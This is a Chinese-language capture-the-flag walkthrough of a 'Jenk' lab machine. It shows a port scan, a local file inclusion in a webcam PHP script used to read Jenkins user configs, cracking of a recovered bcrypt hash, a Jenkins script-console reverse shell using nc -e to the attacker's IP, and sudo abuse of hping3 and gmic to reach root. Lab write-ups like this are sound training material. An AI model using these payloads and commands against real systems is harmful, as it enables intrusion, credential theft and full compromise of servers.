# 靶场搭建
下载:Jenk
Nat,IP: 192.168.1.159
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-server-header: Apache/2.4.56 (Debian) | |
8080/tcp open http Jetty 10.0.13 | |
|_http-server-header: Jetty(10.0.13) | |
| http-robots.txt: 1 disallowed entry | |
|_/ | |
|_http-title: Site doesn't have a title (text/html;charset=utf-8). |
robots.txt 提示 build 按钮,扫了目录没有找到
80 端口扫到了 webcams 目录,打开看了一眼: http://192.168.1.159/webcams/includecam.php?cam=cam
可能是注入或者文件包含
http://192.168.1.159/webcams/includecam.php?cam=/var/lib/jenkins/users/users ,看 response
<?xml version='1.1' encoding='UTF-8'?> | |
<hudson.model.UserIdMapper> | |
<version>1</version> | |
<idToDirectoryNameMap class="concurrent-hash-map"> | |
<entry> | |
<string>andrew</string> | |
<string>andrew_15328478385288074167</string> | |
</entry> | |
</idToDirectoryNameMap> | |
</hudson.model.UserIdMapper> |
包含到了敏感文件,继续包含 Jenkins 文件: http://192.168.1.159/webcams/includecam.php?cam=/var/lib/jenkins/users/andrew_15328478385288074167/config
response 里拿到哈希: $2a$10$V.wxGyfowdGEVLvpQt5DROedmKKUp11g922/V.tb1xmi8eYe7rmzu
┌──(root㉿kali)-[~/Desktop] | |
└─# echo '$2a$10$V.wxGyfowdGEVLvpQt5DROedmKKUp11g922/V.tb1xmi8eYe7rmzu' > hash | |
┌──(root㉿kali)-[~/Desktop] | |
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt | |
Using default input encoding: UTF-8 | |
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) | |
Cost 1 (iteration count) is 1024 for all loaded hashes | |
Will run 4 OpenMP threads | |
Press 'q' or Ctrl-C to abort, almost any other key for status | |
andrew1 (?) | |
1g 0:00:00:08 DONE (2024-05-28 02:27) 0.1197g/s 99.16p/s 99.16c/s 99.16C/s caitlin..yamaha | |
Use the "--show" option to display all of the cracked passwords reliably | |
Session completed. |
得到密码: andrew1
登录到 Jenkins 的后台后,随便开一个 script console 弹个 shell: http://192.168.1.159:8080/computer/(built-in)/script
run 一下: println "nc -e /bin/sh 192.168.1.129 4444".execute().text
拿到 shell
# 提权
sudo -l 发现了 hping3 可以以 andrew 用户执行,拿一下 shell:
jenkins@jenk:~$ sudo -u andrew /usr/sbin/hping3 | |
hping3> /bin/sh |
拿到 andrew 的 shell 之后直接 sudo gmic -exec bash 拿到 root 权限
